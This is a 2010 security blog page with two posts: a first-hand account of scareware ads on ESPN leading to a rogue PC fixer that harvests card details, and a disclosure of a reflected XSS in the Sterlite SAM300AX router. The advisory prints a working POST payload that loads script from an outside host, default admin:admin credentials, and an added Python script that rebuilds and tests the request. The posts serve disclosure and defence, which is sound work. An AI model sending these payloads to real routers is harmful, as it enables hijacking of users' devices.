Sunday, February 21, 2010

ESPN serving scareware ads.


Browsing ESPN online tonight, I came across this on 'http://games.espn.go.com/frontpage':

Assuming this was a one-off random ad, I looked around the site. These are a few of the several screens I found:




It became apparent that these ads were present on the majority of ESPN pages. I know it's a sponsored ad, ESPN, but what the heck!

I fired up Sandboxie and opened this great PC fixer in my sandboxed browser.

The PC MightyMax home page greeted me with its great Windows fixer.

I then downloaded what it offered and proceeded with the installation.

As soon as the installation completed, two processes were started: pcmm2010.exe and csc.exe.


Scary info popped up on my screen:

So my box needs to be fixed, as it says. Go ahead, Max.


Moving forward with the Buy option, a form appears asking for billing details and credit card information.

The next screen needed my e-signature, so I had to give my date of birth; sure, legit :P

Looking at the page source during the transaction, some custom validation appears to happen, I think to confirm whether the credit card number, expiry date and CVV are good or not.

Scrolling down a bit, I see this:

After taking the credit card details and basically all the PII necessary to make a transaction, a 'one-time' charge is deducted as well.

I've cleared this mighty fixer out of my sandbox. This rogue application, PC MightyMax 2010, is an example of scareware. Scareware tactics may also be used by spyware and/or malware.

From Wikipedia:

Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

In this scenario, the scareware gained the trust of an unsuspecting user browsing a trusted site, ESPN, and through strategic placement and frequent repetition of its ad throughout the site, got downloaded and installed on the user's box.

Once installed, it followed the basic routine: a fake scan presenting scary results to push the user to its rogue site and on to a purchase.

Looking at the cost of the purchase, it is damn expensive: $29.95 for 14 days plus an additional one-time charge. Apart from these up-front costs, the user is giving away a good share of his/her personally identifiable information as well as credit card details.

From the perspective of whoever sits at the other end controlling the rogue application, every installation is in all probability generating commission; that is the economy behind scareware.

The process has been known for the last few years, but the quality of scareware marketing campaigns keeps evolving.

In essence, ESPN is the primary entity responsible for facilitating fraud in this instance. ESPN's ad-space business has clearly overlooked the crucial step of vetting ad-space buyers and the kind of ads running on espn.go.com.

Let's see how long this remains unnoticed.

Best Regards.

Sunday, February 7, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I publicly reported an XSS in a Sterlite router on Feb 5, 2010.

The Sterlite SAM300AX is used by MTNL broadband customers in Delhi and Mumbai, India. Given MTNL's customer base in these two metro cities, this vulnerability may be extremely useful to an attacker and/or a bot herder looking for new bots.

After waiting 2+ weeks for a vendor response, I decided to publish this to Full Disclosure / publicly.

Sharing the vulnerable POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101

POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Screenshots

Impact
Script execution in the victim's browser in the context of the router's web interface, theft of the admin login and other nasty things. Note that the captured request is authenticated: the Authorization header above is HTTP Basic and decodes to admin:admin, and browsers resend cached Basic credentials automatically, so a user who has already logged into the router does not need to be tricked into re-authenticating for the injected script to run with admin access.
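The following Python script is an added example, not the router's firmware or the advisory author's tooling. It rebuilds the captured POST (with a Content-Length computed from the body rather than typed in), decodes the Basic auth header and the URL-encoded Stat_Radio payload the way the router's CGI would, and contrasts a hypothetical unescaped reflection of that parameter with an allow-listed and HTML-escaped one. The page does not show how the firmware actually echoes Stat_Radio back, so render_vulnerable(), render_hardened() and the KNOWN_STAT_RADIO set are assumptions; the host, path, Authorization value and form body are taken from the request above.

```python
"""Reflected XSS on the SAM300AX status page: reproduce the request, decode the
payload, and contrast an unescaped reflection with an escaped one.

Added example, not the router's firmware or the author's tooling. The request
body, Host, path and Authorization header are taken from the advisory; how the
firmware echoes Stat_Radio back is not shown on the page, so the two render_*
functions below are hypothetical stand-ins for it.
"""
import base64
from html import escape
from urllib.parse import parse_qs

HOST = "192.168.1.1"
PATH = "/Forms/status_statistics_1"
AUTH_HEADER = "Basic YWRtaW46YWRtaW4="          # copied from the captured request
PAYLOAD_BODY = ("Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org"
                "%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH")

# Hypothetical set of values the Stat_Radio button legitimately takes.
KNOWN_STAT_RADIO = {"ADSL", "LAN", "WLAN"}


def basic_auth_credentials(header):
    """Return (user, password) from an HTTP Basic Authorization header."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic auth header")
    user, _, password = base64.b64decode(token).decode("latin-1").partition(":")
    return user, password


def build_request(body, host=HOST, path=PATH, auth=AUTH_HEADER):
    """Rebuild the raw POST with Content-Length computed from the body."""
    body_bytes = body.encode("ascii")
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Authorization: {auth}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body_bytes)}",
    ]
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body_bytes


def decode_params(body):
    """Decode the form body the way the firmware's CGI handler would see it."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(params):
    """Hypothetical firmware behaviour: echoes Stat_Radio into the HTML as-is."""
    chosen = params.get("Stat_Radio", "")
    return f"<p>Statistics for: {chosen}</p>"


def render_hardened(params):
    """Same page with an allow-list and HTML escaping applied before reflection."""
    chosen = params.get("Stat_Radio", "")
    if chosen not in KNOWN_STAT_RADIO:
        chosen = "ADSL"  # unexpected value: fall back rather than echo it
    return f"<p>Statistics for: {escape(chosen, quote=True)}</p>"


def reflected_unescaped(page, params):
    """True if the decoded Stat_Radio value appears verbatim in the page.

    This is the check to run against the real response: if the decoded payload
    comes back byte-for-byte, the browser parses it as markup.
    """
    probe = params.get("Stat_Radio", "")
    return "<" in probe and probe in page


if __name__ == "__main__":
    params = decode_params(PAYLOAD_BODY)
    print(build_request(PAYLOAD_BODY).decode())
    print("decoded Stat_Radio:", params["Stat_Radio"])
    print("credentials:", basic_auth_credentials(AUTH_HEADER))
    print("vulnerable page reflects payload:",
          reflected_unescaped(render_vulnerable(params), params))
    print("hardened page reflects payload:  ",
          reflected_unescaped(render_hardened(params), params))
```

Pointing build_request() at a real device would of course send the request; the point of the offline version is that the computed Content-Length comes out to the same 101 bytes as the capture, the header decodes to admin:admin, and reflected_unescaped() is the one-line test that distinguishes the vulnerable rendering from the escaped one.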
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.